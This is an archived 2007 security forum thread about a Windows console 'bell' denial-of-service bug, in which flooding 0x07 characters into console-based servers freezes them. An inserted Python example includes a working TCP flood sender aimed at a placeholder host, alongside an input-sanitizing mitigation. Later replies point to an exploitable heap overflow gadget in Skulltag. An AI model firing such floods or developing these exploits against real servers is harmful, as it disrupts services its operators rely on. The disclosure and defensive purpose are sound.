Luigi Auriemma

aluigi.org (ARCHIVE-ONLY FORUM!)

All times are UTC [ DST ]





Forum locked This topic is locked, you cannot edit posts or make further replies.  [ 5 posts ] 
 Post subject: Windows console hell bell bug
PostPosted: 18 Aug 2007 21:50 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
I admit that this type of Denial of Service is probably the most stupid thing I have found, but it works, and it works very well too!

Today I have released a couple of advisories which also contain references to this bug, so you may be interested in taking a look at them:

http://aluigi.org/adv/unrwebdos-adv.txt
http://aluigi.org/adv/toribashish-adv.txt

I had already searched the internet some days ago and found nothing related to this problem, so now I will spend some words on it.

As probably all the people who have played with the Windows console already know, there is an annoying problem which happens when invalid chars are displayed on the screen.
In my tests it seems that on Windows 9x the problem isn't too bad, while on Windows XP (and probably 2k too) it's hell.

How many times have you been left with the console frozen and the speaker yelling while playing with netcat and services which use non-textual data?
The last time this happened to me was at work, and the system slowed down so quickly that it took me many seconds to kill that damned process, with all my colleagues watching me... ah ah ah

Anyway, this stupid effect of the invalid and bell chars can be used as an attack against servers which run in a console and display the user's input.
The only requirements are:
- the ability to display many chars
- no restrictions on the chars; it's important that at least the bell char 0x07 is displayed
- naturally, the Windows console

The effects are great slowness of the entire system, a process which is completely frozen (DoS), and the absurd noisy sound you must hear.

Not an attack which will go down in history, but if you are going to test a server which works in a console you should care about this type of problem too, since the effect works and it can be used in a real attack scenario.
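The two halves of the problem described above, as an added example that is not part of the original post or of the aluigi.org advisories: a small Python script that builds the flood of 0x07 bytes a tester would send to a console-based server that echoes client input, and the input filter such a server should apply before writing untrusted bytes to its window. The target host and port are hypothetical placeholders, and the sample client record is constructed for illustration.

```python
import socket

BELL = 0x07  # ASCII BEL: the byte that makes the Windows console beep and stall

# Hypothetical target (assumption, not from the post): a console-based server
# that echoes client input to its window. Replace with a host you are
# authorised to test.
TARGET_HOST = "192.0.2.10"
TARGET_PORT = 27015


def build_bell_flood(lines: int, bells_per_line: int) -> bytes:
    """Payload of `lines` lines, each `bells_per_line` BEL bytes plus CRLF.

    Line-oriented servers usually print one line per received record, so
    CRLF-terminated lines make sure every bell actually reaches the console
    instead of sitting in a read buffer.
    """
    line = bytes([BELL]) * bells_per_line + b"\r\n"
    return line * lines


def send_flood(payload: bytes, host: str = TARGET_HOST, port: int = TARGET_PORT,
               chunk: int = 1024) -> int:
    """Send the payload over TCP in chunks; returns the number of bytes sent."""
    sent = 0
    with socket.create_connection((host, port), timeout=5) as sock:
        for off in range(0, len(payload), chunk):
            piece = payload[off:off + chunk]
            sock.sendall(piece)
            sent += len(piece)
    return sent


# ---- server-side mitigation -------------------------------------------------

SAFE_WHITESPACE = frozenset(b"\t\r\n")


def sanitize_for_console(data: bytes, replacement: bytes = b".") -> bytes:
    """Replace every byte a console should not see (anything outside printable
    ASCII except tab/CR/LF) before the server logs or echoes client input.
    BEL (0x07), ESC (0x1b) and high bytes are all neutralised."""
    out = bytearray()
    for b in data:
        if 0x20 <= b <= 0x7E or b in SAFE_WHITESPACE:
            out.append(b)
        else:
            out += replacement
    return bytes(out)


def count_control_bytes(data: bytes) -> int:
    """Number of bytes sanitize_for_console would replace; useful as a
    threshold for dropping abusive clients instead of merely cleaning output."""
    return sum(1 for b in data
               if not (0x20 <= b <= 0x7E or b in SAFE_WHITESPACE))


if __name__ == "__main__":
    # Constructed sample of what a malicious client might send.
    sample = b"hello\x07\x07\x07\x1b[2J\xff\n"
    print(count_control_bytes(sample))      # 5
    print(sanitize_for_console(sample))     # b'hello....[2J.\n'
    # Uncomment to actually fire the flood at a host you are allowed to test:
    # send_flood(build_bell_flood(lines=2000, bells_per_line=64))
```

The filter is deliberately a whitelist (printable ASCII plus tab, CR and LF) rather than a blacklist of BEL alone: ESC sequences and high bytes cause the same kind of console trouble the post mentions for "invalid chars", and a whitelist covers them without having to enumerate every case.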


 Post subject:
PostPosted: 18 Aug 2007 22:14 

Joined: 14 Aug 2007 13:32
Posts: 71
Oh nice Luigi, great work dude. I looked into the replay file but the stack became so corrupted I gave up, m8.


 Post subject:
PostPosted: 23 Aug 2007 22:16 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
Today I have released another couple of advisories about this type of bug.
If someone has tested them (in a real or test scenario) it would be cool to know what you think about them.


 Post subject:
PostPosted: 23 Aug 2007 22:27 

Joined: 14 Aug 2007 13:32
Posts: 71
Just got back online, Luigi. I will take a look after I've had a cup of chocolate, m8, and comment on this. Love it when there are a load of advisories found; I think you have little elves working for you, lol. See if I can get some PoC code written for at least one of them. Of course, if you don't mind, Luigi, as I know you don't like messing with shellcode and stuff like that.

You know what I think is good is that you are willing to try and go into uncharted waters; by this I mean you're willing to try new stuff like these types of bugs you have found. This is what the security industry needs.

Someone has been busy :D.


 Post subject:
PostPosted: 23 Aug 2007 22:38 

Joined: 13 Aug 2007 21:44
Posts: 4068
Location: http://aluigi.org
Arghh, these damned elves are mad, ih ih ih
At the moment my bug queue is empty, so no advisories for the next few days.
If you like challenges you might like to write an exploit for the Skulltag heap overflow. I have debugged it and there is a possibility to control the code flow... sure, I'm not an expert in hof exploitation so I'm the last person on earth who should talk about this, but there is a nice "mov eax, [edi+10]; call eax" which is very interesting, moreover because edi is controlled by us.


